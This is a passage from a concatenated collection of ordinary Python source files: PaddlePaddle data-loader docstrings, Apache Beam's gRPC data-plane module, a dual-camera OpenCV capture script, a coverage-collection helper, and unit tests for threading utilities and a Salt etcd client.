yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
data_plane.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of ``DataChannel``s to communicate across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import queue
import sys
import threading
from builtins import object
from builtins import range
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
# This module is experimental. No backwards-compatibility guarantees.
_DEFAULT_FLUSH_THRESHOLD = 10 << 20 # 10MB
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
"""A Outputstream for use with CoderImpls that has a close() method."""
def __init__(self,
close_callback=None,
flush_callback=None,
flush_threshold=_DEFAULT_FLUSH_THRESHOLD):
super(ClosableOutputStream, self).__init__()
self._close_callback = close_callback
self._flush_callback = flush_callback
self._flush_threshold = flush_threshold
# This must be called explicitly to avoid flushing partial elements.
def maybe_flush(self):
if self._flush_callback and self.size() > self._flush_threshold:
self._flush_callback(self.get())
self._clear()
def close(self):
if self._close_callback:
self._close_callback(self.get())
class DataChannel(with_metaclass(abc.ABCMeta, object)):
"""Represents a channel for reading and writing data over the data plane.
Read from this channel with the input_elements method::
for elements_data in data_channel.input_elements(
instruction_id, transform_ids):
[process elements_data]
Write to this channel using the output_stream method::
out1 = data_channel.output_stream(instruction_id, transform_id)
out1.write(...)
out1.close()
When all data for all instructions is written, close the channel::
data_channel.close()
"""
@abc.abstractmethod
def input_elements(
self, instruction_id, expected_transforms, abort_callback=None):
"""Returns an iterable of all Element.Data bundles for instruction_id.
This iterable terminates only once the full set of data has been recieved
for each of the expected transforms. It may block waiting for more data.
Args:
instruction_id: which instruction the results must belong to
expected_transforms: which transforms to wait on for completion
abort_callback: a callback to invoke if blocking returning whether
to abort before consuming all the data
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def output_stream(self, instruction_id, transform_id):
"""Returns an output stream writing elements to transform_id.
Args:
instruction_id: which instruction this stream belongs to
transform_id: the transform_id of the returned stream
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Closes this channel, indicating that all data has been written.
Data can continue to be read.
If this channel is shared by many instructions, should only be called on
worker shutdown.
"""
raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
"""An in-memory implementation of a DataChannel.
This channel is two-sided. What is written to one side is read by the other.
The inverse() method returns the other side of a instance.
"""
def __init__(self, inverse=None):
self._inputs = []
self._inverse = inverse or InMemoryDataChannel(self)
def inverse(self):
return self._inverse
def input_elements(self, instruction_id, unused_expected_transforms=None,
abort_callback=None):
other_inputs = []
for data in self._inputs:
if data.instruction_reference == instruction_id:
if data.data:
yield data
else:
other_inputs.append(data)
self._inputs = other_inputs
def output_stream(self, instruction_id, transform_id):
def add_to_inverse_output(data):
self._inverse._inputs.append( # pylint: disable=protected-access
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
ptransform_id=transform_id,
data=data))
return ClosableOutputStream(
add_to_inverse_output, flush_callback=add_to_inverse_output)
def close(self):
pass
class _GrpcDataChannel(DataChannel):
"""Base class for implementing a BeamFnData-based DataChannel."""
_WRITES_FINISHED = object()
def __init__(self):
self._to_send = queue.Queue()
self._received = collections.defaultdict(queue.Queue)
self._receive_lock = threading.Lock()
self._reads_finished = threading.Event()
self._closed = False
self._exc_info = None
def close(self):
self._to_send.put(self._WRITES_FINISHED)
self._closed = True
def wait(self, timeout=None):
self._reads_finished.wait(timeout)
def _receiving_queue(self, instruction_id):
with self._receive_lock:
return self._received[instruction_id]
def _clean_receiving_queue(self, instruction_id):
with self._receive_lock:
self._received.pop(instruction_id)
def input_elements(self, instruction_id, expected_transforms,
abort_callback=None):
"""
Generator to retrieve elements for an instruction_id
input_elements should be called only once for an instruction_id
Args:
instruction_id(str): instruction_id for which data is read
expected_transforms(collection): expected transforms
"""
received = self._receiving_queue(instruction_id)
done_transforms = []
abort_callback = abort_callback or (lambda: False)
try:
while len(done_transforms) < len(expected_transforms):
try:
data = received.get(timeout=1)
except queue.Empty:
if self._closed:
raise RuntimeError('Channel closed prematurely.')
if abort_callback():
return
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
else:
if not data.data and data.ptransform_id in expected_transforms:
done_transforms.append(data.ptransform_id)
else:
assert data.ptransform_id not in done_transforms
yield data
finally:
# Instruction_ids are not reusable so Clean queue once we are done with
# an instruction_id
self._clean_receiving_queue(instruction_id)
def output_stream(self, instruction_id, transform_id):
def add_to_send_queue(data):
if data:
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
ptransform_id=transform_id,
data=data))
def close_callback(data):
add_to_send_queue(data)
# End of stream marker.
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
ptransform_id=transform_id,
data=b''))
return ClosableOutputStream(
close_callback, flush_callback=add_to_send_queue)
def _write_outputs(self):
done = False
while not done:
data = [self._to_send.get()]
try:
# Coalesce up to 100 other items.
for _ in range(100):
data.append(self._to_send.get_nowait())
except queue.Empty:
pass
if data[-1] is self._WRITES_FINISHED:
done = True
data.pop()
if data:
yield beam_fn_api_pb2.Elements(data=data)
def _read_inputs(self, elements_iterator):
# TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
try:
for elements in elements_iterator:
for data in elements.data:
self._receiving_queue(data.instruction_reference).put(data)
except: # pylint: disable=bare-except
if not self._closed:
logging.exception('Failed to read inputs in the data plane.')
self._exc_info = sys.exc_info()
raise
finally:
self._closed = True
self._reads_finished.set()
def set_inputs(self, elements_iterator):
reader = threading.Thread(
target=lambda: self._read_inputs(elements_iterator),
name='read_grpc_client_inputs')
reader.daemon = True
reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
"""A DataChannel wrapping the client side of a BeamFnData connection."""
def __init__(self, data_stub):
super(GrpcClientDataChannel, self).__init__()
self.set_inputs(data_stub.Data(self._write_outputs()))
class BeamFnDataServicer(beam_fn_api_pb2_grpc.BeamFnDataServicer):
"""Implementation of BeamFnDataServicer for any number of clients"""
def __init__(self):
self._lock = threading.Lock()
self._connections_by_worker_id = collections.defaultdict(
_GrpcDataChannel)
def get_conn_by_worker_id(self, worker_id):
with self._lock:
return self._connections_by_worker_id[worker_id]
def Data(self, elements_iterator, context):
worker_id = dict(context.invocation_metadata()).get('worker_id')
data_conn = self.get_conn_by_worker_id(worker_id)
data_conn.set_inputs(elements_iterator)
for elements in data_conn._write_outputs():
yield elements
class DataChannelFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_data_channel(self, remote_grpc_port):
"""Returns a ``DataChannel`` from the given RemoteGrpcPort."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
"""A factory for ``GrpcClientDataChannel``.
Caches the created channels by ``data descriptor url``.
"""
def __init__(self, credentials=None, worker_id=None):
self._data_channel_cache = {}
self._lock = threading.Lock()
self._credentials = None
self._worker_id = worker_id
if credentials is not None:
logging.info('Using secure channel creds.')
self._credentials = credentials
def create_data_channel(self, remote_grpc_port):
url = remote_grpc_port.api_service_descriptor.url
if url not in self._data_channel_cache:
with self._lock:
if url not in self._data_channel_cache:
logging.info('Creating client data channel for %s', url)
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
channel_options = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
grpc_channel = None
if self._credentials is None:
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=channel_options)
else:
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=channel_options)
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(
grpc_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_cache[url] = GrpcClientDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel))
return self._data_channel_cache[url]
def close(self):
logging.info('Closing all cached grpc data channels.')
for _, channel in self._data_channel_cache.items():
channel.close()
self._data_channel_cache.clear()
class InMemoryDataChannelFactory(DataChannelFactory):
"""A singleton factory for ``InMemoryDataChannel``."""
def __init__(self, in_memory_data_channel):
self._in_memory_data_channel = in_memory_data_channel
def create_data_channel(self, unused_remote_grpc_port):
return self._in_memory_data_channel
def close(self):
pass
|
CamCSI.py
|
import cv2
import threading
import numpy as np
class CSI_Camera:
def __init__(self, sensor_id):
# Initialize instance variables
# OpenCV video capture element
self.video_capture = None
# The last captured image from the camera
self.frame = None
self.grabbed = False
# The thread where the video capture runs
self.read_thread = None
self.read_lock = threading.Lock()
self.running = False
self.sensor_id = sensor_id
self.gstreamer_pipeline_string = (
"nvarguscamerasrc sensor-id=%d sensor-mode=3 ! "
"video/x-raw(memory:NVMM), width=(int)1640, height=(int)1232, framerate=(fraction)30/1 ! "
"nvvidconv flip-method=0 ! "
"video/x-raw, width=(int)960, height=(int)720, format=(string)BGRx ! "
"videoconvert ! "
"video/x-raw, format=(string)BGR ! appsink"%self.sensor_id)
def open(self):
try:
self.video_capture = cv2.VideoCapture(
self.gstreamer_pipeline_string, cv2.CAP_GSTREAMER
)
# Grab the first frame to start the video capturing
self.grabbed, self.frame = self.video_capture.read()
except RuntimeError:
self.video_capture = None
print("Erreur - Impossible d'ouvrir les cameras")
print("Pipeline Gstreamer: " + self.gstreamer_pipeline_string)
def start(self):
if self.running:
print("Le stream est en cours d'execution")
return None
# create a thread to read the camera image
if self.video_capture != None:
self.running = True
self.read_thread = threading.Thread(target=self.updateCamera)
self.read_thread.start()
return self
def stop(self):
self.running = False
# Kill the thread
self.read_thread.join()
self.read_thread = None
def updateCamera(self):
# This is the thread to read images from the camera
while self.running:
try:
grabbed, frame = self.video_capture.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
except RuntimeError:
print("Impossible d'acquerir l'image de la camera")
# FIX ME - stop and cleanup thread
# Something bad happened
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def release(self):
if self.video_capture != None:
self.video_capture.release()
self.video_capture = None
# Now kill the thread
if self.read_thread != None:
self.read_thread.join()
"""
gstreamer_pipeline returns a GStreamer pipeline for capturing from the CSI camera
Flip the image by setting the flip_method (most common values: 0 and 2)
display_width and display_height determine the size of each camera pane in the window on the screen
Default 1920x1080
"""
def run_cameras():
window_title = "Dual CSI Cameras"
left_camera = CSI_Camera(1)
left_camera.open()
left_camera.start()
right_camera = CSI_Camera(0)
right_camera.open()
right_camera.start()
if left_camera.video_capture.isOpened() and right_camera.video_capture.isOpened():
cv2.namedWindow(window_title, cv2.WINDOW_AUTOSIZE)
try:
while True:
_, left_image = left_camera.read()
_, right_image = right_camera.read()
camera_images = np.hstack((left_image, right_image))
if cv2.getWindowProperty(window_title, cv2.WND_PROP_AUTOSIZE) >= 0:
cv2.imshow(window_title, camera_images)
else:
break
keyCode = cv2.waitKey(10) & 0xFF
if keyCode == 27:
break
finally:
left_camera.stop()
left_camera.release()
right_camera.stop()
right_camera.release()
cv2.destroyAllWindows()
else:
print("Error: Unable to open both cameras")
left_camera.stop()
left_camera.release()
right_camera.stop()
right_camera.release()
if __name__ == "__main__":
run_cameras()
|
pyCov_multithreading.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import commands
from xml.etree import ElementTree
import re
import time
import queue
import threading
import os
import json
import sys
taskQueue = queue.Queue()
lock = threading.RLock()
def worker(fun):
while True:
temp = taskQueue.get()
fun(temp)
taskQueue.task_done()
def threadPool(threadPoolNum):
threadPool = []
for i in range(threadPoolNum):
thread = threading.Thread(target=worker, args={doFun, })
thread.daemon = True
threadPool.append(thread)
return threadPool
def getPyCovResult(params):
rootPath = params[0]
ut = params[1]
print("ut: %s" % ut)
startTime = int(time.time())
path = '%s/build/pytest/%s' % (rootPath, ut)
os.system('cd %s && coverage combine `ls python-coverage.data.*`' % path)
os.system('cd %s && pwd && coverage xml -i -o python-coverage.xml' % path)
xml_path = '%s/python-coverage.xml' % path
os.system("python %s/tools/analysisPyXml.py %s %s" %
(rootPath, rootPath, ut))
endTime = int(time.time())
print('pyCov Time: %s' % (endTime - startTime))
def doFun(params):
getPyCovResult(params)
def main(rootPath):
"""
1. get gcov file
2. get gcov file not coverageratio = 0
"""
path = '%s/build/pytest' % rootPath
dirs = os.listdir(path)
pool = threadPool(23)
for i in range(pool.__len__()):
pool[i].start()
for ut in dirs:
params = [rootPath, ut]
taskQueue.put(params)
taskQueue.join()
if __name__ == "__main__":
rootPath = sys.argv[1]
main(rootPath)
|
test_utils.py
|
import unittest
import heapq
import random
import threading
from garage.threads import utils
class UtilsTest(unittest.TestCase):
def test_atomic_int(self):
i = utils.AtomicInt()
self.assertEqual(0, i.get_and_add(0))
self.assertEqual(0, i.get_and_add(1))
self.assertEqual(1, i.get_and_add(2))
self.assertEqual(3, i.get_and_add(3))
self.assertEqual(6, i.get_and_add(4))
self.assertEqual(10, i.get_and_add(0))
self.assertEqual(10, i.get_and_set(-1))
self.assertEqual(-1, i.get_and_set(2))
self.assertEqual(2, i.get_and_set(0))
def test_atomic_set(self):
s = utils.AtomicSet()
self.assertFalse('x' in s)
self.assertFalse(s.check_and_add('x'))
self.assertTrue('x' in s)
self.assertFalse(s.check_and_add('y'))
self.assertTrue('y' in s)
def test_priority(self):
with self.assertRaises(AssertionError):
utils.Priority([]) # Non-hashable!
eq = self.assertEqual
lt = self.assertLess
gt = self.assertGreater
test_data = [
(eq, utils.Priority.LOWEST, utils.Priority.LOWEST),
(gt, utils.Priority.LOWEST, utils.Priority('x')),
(gt, utils.Priority.LOWEST, utils.Priority.HIGHEST),
(eq, utils.Priority('x'), utils.Priority('x')),
(lt, utils.Priority('x'), utils.Priority('y')),
(gt, utils.Priority('x'), utils.Priority('w')),
(lt, utils.Priority('x'), utils.Priority.LOWEST),
(gt, utils.Priority('x'), utils.Priority.HIGHEST),
(eq, utils.Priority.HIGHEST, utils.Priority.HIGHEST),
(lt, utils.Priority.HIGHEST, utils.Priority('x')),
(lt, utils.Priority.HIGHEST, utils.Priority.LOWEST),
]
for assertion, left, right in test_data:
assertion(left, right)
if assertion is eq:
self.assertEqual(hash(left), hash(right))
else:
self.assertNotEqual(hash(left), hash(right))
def test_priority_with_heap(self):
def heapsort(iterable):
heap = []
for value in iterable:
heapq.heappush(heap, value)
return [heapq.heappop(heap) for _ in range(len(heap))]
random.seed(4)
for expect in (
[],
[utils.Priority(0)],
[utils.Priority.HIGHEST],
[utils.Priority.LOWEST],
[utils.Priority(0), utils.Priority(0)],
[utils.Priority(0), utils.Priority(1)],
[utils.Priority(0), utils.Priority.LOWEST],
[utils.Priority.HIGHEST, utils.Priority(0)],
[utils.Priority.HIGHEST, utils.Priority.LOWEST],
[utils.Priority(0), utils.Priority(0), utils.Priority(0)],
[utils.Priority(0), utils.Priority(1), utils.Priority(2)],
[utils.Priority(0), utils.Priority(1), utils.Priority.LOWEST],
[utils.Priority.HIGHEST, utils.Priority(0), utils.Priority(1)],
[
utils.Priority.HIGHEST,
utils.Priority(0),
utils.Priority.LOWEST,
],
):
actual = list(expect)
random.shuffle(actual)
actual = heapsort(actual)
self.assertListEqual(expect, actual)
actual = heapsort((reversed(expect)))
self.assertListEqual(expect, actual)
def test_generate_names(self):
names = utils.generate_names(name='hello')
self.assertEqual('hello-01', next(names))
self.assertEqual('hello-02', next(names))
self.assertEqual('hello-03', next(names))
names = utils.generate_names(
name_format='{string}-{serial}',
string='hello',
serial=utils.AtomicInt(0))
self.assertEqual('hello-0', next(names))
self.assertEqual('hello-1', next(names))
self.assertEqual('hello-2', next(names))
def test_make_get_thread_local(self):
# They should access the same 'x'
get_x_1 = utils.make_get_thread_local(
'x', lambda: threading.current_thread().ident)
get_x_2 = utils.make_get_thread_local(
'x', lambda: self.fail('this should not be called'))
def func(x_output):
x_output.append(get_x_1())
x_output.append(get_x_2())
t1_x = []
t1 = threading.Thread(target=func, args=(t1_x,))
t1.start()
t2_x = []
t2 = threading.Thread(target=func, args=(t2_x,))
t2.start()
t1.join()
t2.join()
self.assertEqual([t1.ident, t1.ident], t1_x)
self.assertEqual([t2.ident, t2.ident], t2_x)
if __name__ == '__main__':
unittest.main()
|
test_etcd_util.py
|
import copy
import logging
import threading
import time
import pytest
from salt.utils.etcd_util import EtcdClient, EtcdClientV3, get_conn
from tests.support.pytest.etcd import * # pylint: disable=wildcard-import,unused-wildcard-import
pytest.importorskip("docker")
log = logging.getLogger(__name__)
pytestmark = [
pytest.mark.slow_test,
pytest.mark.windows_whitelisted,
pytest.mark.skip_if_binaries_missing("docker", "dockerd", check_all=False),
]
@pytest.fixture(scope="module")
def minion_config_overrides(etcd_profile):
return etcd_profile
@pytest.fixture(scope="module")
def etcd_client(minion_opts, profile_name):
return get_conn(minion_opts, profile=profile_name)
@pytest.fixture(scope="module")
def prefix():
return "/salt/util/test"
@pytest.fixture(autouse=True)
def cleanup_prefixed_entries(etcd_client, prefix):
"""
Cleanup after each test to ensure a consistent starting state.
"""
try:
assert etcd_client.get(prefix, recurse=True) is None
yield
finally:
etcd_client.delete(prefix, recurse=True)
def test_etcd_client_creation(minion_opts, profile_name, etcd_version):
"""
Client creation using client classes, just need to assert no errors.
"""
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
EtcdClient(minion_opts, profile=profile_name)
else:
EtcdClientV3(minion_opts, profile=profile_name)
def test_etcd_client_creation_with_get_conn(minion_opts, profile_name):
"""
Client creation using get_conn, just need to assert no errors.
"""
get_conn(minion_opts, profile=profile_name)
def test_simple_operations(etcd_client, prefix):
"""
Verify basic functionality in order to justify use of the cleanup fixture.
"""
assert not etcd_client.get("{}/mtg/ambush".format(prefix))
assert etcd_client.set("{}/mtg/ambush".format(prefix), "viper") == "viper"
assert etcd_client.get("{}/mtg/ambush".format(prefix)) == "viper"
assert etcd_client.set("{}/mtg/counter".format(prefix), "spell") == "spell"
assert etcd_client.tree("{}/mtg".format(prefix)) == {
"ambush": "viper",
"counter": "spell",
}
assert etcd_client.ls("{}/mtg".format(prefix)) == {
"{}/mtg".format(prefix): {
"{}/mtg/ambush".format(prefix): "viper",
"{}/mtg/counter".format(prefix): "spell",
},
}
assert etcd_client.delete("{}/mtg/ambush".format(prefix))
assert etcd_client.delete("{}/mtg".format(prefix), recurse=True)
assert not etcd_client.get("{}/mtg".format(prefix), recurse=True)
def test_simple_operations_with_raw_keys_and_values(
minion_opts, profile_name, prefix, etcd_version
):
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
pytest.skip("Not testing with raw keys using v2")
modified_opts = copy.deepcopy(minion_opts)
modified_opts[profile_name]["etcd.raw_keys"] = True
modified_opts[profile_name]["etcd.raw_values"] = True
etcd_client = get_conn(modified_opts, profile=profile_name)
assert not etcd_client.get("{}/mtg/ambush".format(prefix))
assert etcd_client.set("{}/mtg/ambush".format(prefix), "viper") == b"viper"
assert etcd_client.get("{}/mtg/ambush".format(prefix)) == b"viper"
assert etcd_client.set("{}/mtg/counter".format(prefix), "spell") == b"spell"
assert etcd_client.tree("{}/mtg".format(prefix)) == {
b"ambush": b"viper",
b"counter": b"spell",
}
assert etcd_client.ls("{}/mtg".format(prefix)) == {
"{}/mtg".format(prefix).encode("UTF-8"): {
"{}/mtg/ambush".format(prefix).encode("UTF-8"): b"viper",
"{}/mtg/counter".format(prefix).encode("UTF-8"): b"spell",
},
}
assert etcd_client.delete("{}/mtg/ambush".format(prefix))
assert etcd_client.delete("{}/mtg".format(prefix), recurse=True)
assert not etcd_client.get("{}/mtg".format(prefix), recurse=True)
def test_get(subtests, etcd_client, prefix):
"""
Test that get works as intended.
"""
# Test general get case with key=value
with subtests.test("inserted keys should be able to be retrieved"):
etcd_client.set("{}/get-test/key".format(prefix), "value")
assert etcd_client.get("{}/get-test/key".format(prefix)) == "value"
# Test with recurse=True.
with subtests.test("keys should be able to be retrieved recursively"):
etcd_client.set("{}/get-test/key2/subkey".format(prefix), "subvalue")
etcd_client.set("{}/get-test/key2/subkey2/1".format(prefix), "subvalue1")
etcd_client.set("{}/get-test/key2/subkey2/2".format(prefix), "subvalue2")
expected = {
"subkey": "subvalue",
"subkey2": {
"1": "subvalue1",
"2": "subvalue2",
},
}
assert (
etcd_client.get("{}/get-test/key2".format(prefix), recurse=True) == expected
)
def test_read(subtests, etcd_client, prefix, etcd_version):
"""
Test that we are able to read and wait.
"""
etcd_client.set("{}/read/1".format(prefix), "one")
etcd_client.set("{}/read/2".format(prefix), "two")
etcd_client.set("{}/read/3/4".format(prefix), "three/four")
# Simple read test
with subtests.test(
"reading a newly inserted and existent key should return that key"
):
result = etcd_client.read("{}/read/1".format(prefix))
assert result
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
assert result.value == "one"
else:
assert result.pop().value == "one"
# Recursive read test
with subtests.test(
"reading recursively should return a dictionary starting at the given key"
):
expected = etcd_client._flatten(
{
"1": "one",
"2": "two",
"3": {"4": "three/four"},
},
path="{}/read".format(prefix),
)
result = etcd_client.read("{}/read".format(prefix), recurse=True)
assert result
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
assert result.children
else:
assert len(result) > 1
result_dict = {}
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
for child in result.children:
result_dict[child.key] = child.value
else:
for child in result:
if child.key != "{}/read".format(prefix):
result_dict[child.key] = child.value
assert result_dict == expected
# Wait for an update
with subtests.test("updates should be able to be caught by waiting in read"):
return_list = []
def wait_func(return_list):
return_list.append(
etcd_client.read("{}/read/1".format(prefix), wait=True, timeout=30)
)
wait_thread = threading.Thread(target=wait_func, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/read/1".format(prefix), "not one")
wait_thread.join()
modified = return_list.pop()
assert modified.key == "{}/read/1".format(prefix)
assert modified.value == "not one"
# Wait for an update using recursive
with subtests.test("nested updates should be catchable"):
return_list = []
def wait_func_2(return_list):
return_list.append(
etcd_client.read(
"{}/read".format(prefix), wait=True, timeout=30, recurse=True
)
)
wait_thread = threading.Thread(target=wait_func_2, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/read/1".format(prefix), "one again!")
wait_thread.join()
modified = return_list.pop()
assert modified.key == "{}/read/1".format(prefix)
assert modified.value == "one again!"
# Wait for an update after last modification
with subtests.test(
"updates should be able to be caught after an index by waiting in read"
):
return_list = []
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
last_modified = modified.modifiedIndex
else:
last_modified = modified.mod_revision
def wait_func_3(return_list):
return_list.append(
etcd_client.read(
"{}/read/1".format(prefix),
wait=True,
timeout=30,
start_revision=last_modified + 1,
)
)
wait_thread = threading.Thread(target=wait_func_3, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/read/1".format(prefix), "one")
wait_thread.join()
modified = return_list.pop()
assert modified.key == "{}/read/1".format(prefix)
assert modified.value == "one"
# Wait for an update after last modification, recursively
with subtests.test("nested updates after index should be catchable"):
return_list = []
if etcd_version in (EtcdVersion.v2, EtcdVersion.v3_v2_mode):
last_modified = modified.modifiedIndex
else:
last_modified = modified.mod_revision
def wait_func_4(return_list):
return_list.append(
etcd_client.read(
"{}/read".format(prefix),
wait=True,
timeout=30,
recurse=True,
start_revision=last_modified + 1,
)
)
wait_thread = threading.Thread(target=wait_func_4, args=(return_list,))
wait_thread.start()
time.sleep(1)
etcd_client.set("{}/read/1".format(prefix), "one")
wait_thread.join()
modified = return_list.pop()
assert modified.key == "{}/read/1".format(prefix)
assert modified.value == "one"
def test_update(subtests, etcd_client, prefix):
"""
Ensure that we can update fields
"""
etcd_client.set("{}/read/1".format(prefix), "one")
etcd_client.set("{}/read/2".format(prefix), "two")
etcd_client.set("{}/read/3/4".format(prefix), "three/four")
# Update existent fields
with subtests.test("update should work on already existent field"):
updated = {
"{}/read/1".format(prefix): "not one",
"{}/read/2".format(prefix): "not two",
}
assert etcd_client.update(updated) == updated
assert etcd_client.get("{}/read/1".format(prefix)) == "not one"
assert etcd_client.get("{}/read/2".format(prefix)) == "not two"
# Update non-existent fields
with subtests.test("update should work on non-existent fields"):
updated = {
prefix: {
"read-2": "read-2",
"read-3": "read-3",
"read-4": {
"sub-4": "subvalue-1",
"sub-4-2": "subvalue-2",
},
}
}
assert etcd_client.update(updated) == etcd_client._flatten(updated)
assert etcd_client.get("{}/read-2".format(prefix)) == "read-2"
assert etcd_client.get("{}/read-3".format(prefix)) == "read-3"
assert (
etcd_client.get("{}/read-4".format(prefix), recurse=True)
== updated[prefix]["read-4"]
)
with subtests.test("we should be able to prepend a path within update"):
updated = {
"1": "path updated one",
"2": "path updated two",
}
expected_return = {
"{}/read/1".format(prefix): "path updated one",
"{}/read/2".format(prefix): "path updated two",
}
assert (
etcd_client.update(updated, path="{}/read".format(prefix))
== expected_return
)
assert etcd_client.get("{}/read/1".format(prefix)) == "path updated one"
assert etcd_client.get("{}/read/2".format(prefix)) == "path updated two"
def test_write_file(subtests, etcd_client, prefix):
"""
Test solely writing files
"""
with subtests.test(
"we should be able to write a single value for a non-existent key"
):
assert (
etcd_client.write_file("{}/write/key_1".format(prefix), "value_1")
== "value_1"
)
assert etcd_client.get("{}/write/key_1".format(prefix)) == "value_1"
